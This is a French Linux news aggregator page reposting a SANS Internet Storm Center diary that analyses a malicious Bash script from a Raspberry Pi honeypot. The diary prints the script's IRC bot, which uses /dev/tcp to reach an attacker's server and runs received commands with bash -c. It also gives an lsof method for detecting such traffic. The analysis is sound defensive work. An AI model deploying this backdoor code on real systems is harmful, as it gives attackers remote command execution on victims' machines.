GNU/Linux and opensource news gathered

http://linux.feeder.ww7.be
«  avril 2018
lundi mardi mercredi jeudi vendredi samedi dimanche
26 27 28 29 30 31 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 1 2 3 4 5 6
retour à la date courante

Aujourd'hui 2 nouvelles :


  • Malicious Network Traffic From /bin/bash, (Wed, Apr 25th), 25 avril 2018

    mercredi 25 avril 2018 :: SANS Internet Storm Center, InfoCON : green :: RSS
    One of our readers from Germany sent me a malicious shell script captured by our honeypot[1] running on his Raspberry.  It's a simple UNIX Bash script that performs a bunch of malicious tasks:
    • Kills existing crypto miner processes (classic action these days)
    • Changes the password of the user 'pi' and adds an SSH key 
    • Changes the DNS resolver configuration and add some DNS blackholes in /etc/hosts (redirecting to 127.0.0.1)
    • Creates an IRC bot
    • Installs extra tools like zmap and sshpass
    • Installs itself in /etc/rc.local for persistence

    The script itself is not new, it was already spotted in July 2017 but it looks to be slightly modified and was uploaded recently to VT[2] (current score is 9/59). The most interesting part of the script is the ability to run a simple IRC bot in using Bash commands. No need for a high-level language. Bash has a very interesting feature for years that not many people are aware of. You can generate network flows using standard redirections. By default, a UNIX process has always the following file descriptors available: 0 (/dev/stdin), 1 (/dev/stdout) and 2 (/dev/stderr). You can use them in commands like:
    $ echo "Hello world" >/dev/stderr

    In the same way, Bash can use /dev/tcp or /dev/udp to generate network flow. The syntax is /dev/<proto>/>host>/>port>.
    That's the feature used in the sample. Here is how to create a simple bot (the code has been beautified):
    eval 'exec 3<>/dev/tcp/$ircserver/6667;'
    if [[ ! "$?" -eq 0 ]] ; then
        continue
    fi
    eval 'printf "NICK $NICK\r\n" >&3;'
    if [[ ! "$?" -eq 0 ]] ; then
        continue
    fi
    eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
    if [[ ! "$?" -eq 0 ]] ; then
        continue
    fi
    # Main loop
    while [ true ]; do
        eval "read msg_in <&3;"
        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi
        if  [[ "$msg_in" =~ "PING" ]] ; then
            printf "PONG %s\n" "${msg_in:5}";
            eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
            if [[ ! "$?" -eq 0 ]] ; then
                break
            fi
            sleep 1
            eval 'printf "JOIN #biret\r\n" >&3;'
            if [[ ! "$?" -eq 0 ]] ; then
                break
            fi
        elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
            privmsg_h=$(echo $msg_in| cut -d':' -f 3)
            privmsg_data=$(echo $msg_in| cut -d':' -f 4)
            privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)
            hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
            sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`
    
            if [[ "$sign" == "$hash" ]] ; then
                CMD=`echo $privmsg_data | base64 -d -i`
                RES=`bash -c "$CMD" | base64 -w 0`
                eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
                if [[ ! "$?" -eq 0 ]] ; then
                    break
                fi
            fi
        fi
    done

    The magic line is the first one which created a new file descriptor ('3') that will be used to read/write to the TCP session established with the IRC server on port 6667. The attacker is able to submit commands to the bot via private messages (once authenticated). The result of the command is sent back. 
    Be aware that not all Bash binaries have this feature enabled by default (for security reasons). If you want to use this specific feature, you can always recompile a Bash with the following directive '--enable-net-redirections'. This can be helpful in many cases. Example to grab data from a remote server without external tools:
    exec 5<> /dev/tcp/blog.rootshell.be/80
    printf "GET / HTTP/1.0\nHost: blog.rootshell.be\n" >&5
    cat <&5
    exec 5>&-
    

    A simple way to detect this behaviour is to search for network flows generated by /bin/bash processed. Example using lsof[3]:
    # lsof -i | grep bash
    bash      81084 xavier    5u  IPv4 0x1cbc30b70d8a7879      0t0  TCP xxxxx.rootshell.be:57253->blog.rootshell.be:http (ESTABLISHED)

    [1] https://isc.sans.edu/honeypot.html
    [2] https://www.virustotal.com/#/file/ce53ae1c4f43f9f63b61fa1abd675cb8c0893aa3ffb50506fc401c5978318f74/detection
    [3] https://www.forensicswiki.org/wiki/Lsof
    Xavier Mertens (@xme)
    ISC Handler - Freelance Security Consultant
    PGP Key (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Lire la suite
  • ISC Stormcast For Wednesday, April 25th 2018 https://isc.sans.edu/podcastdetail.html?id=5969, (Wed, Apr 25th), 25 avril 2018

    mercredi 25 avril 2018 :: SANS Internet Storm Center, InfoCON : green :: RSS
    (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Lire la suite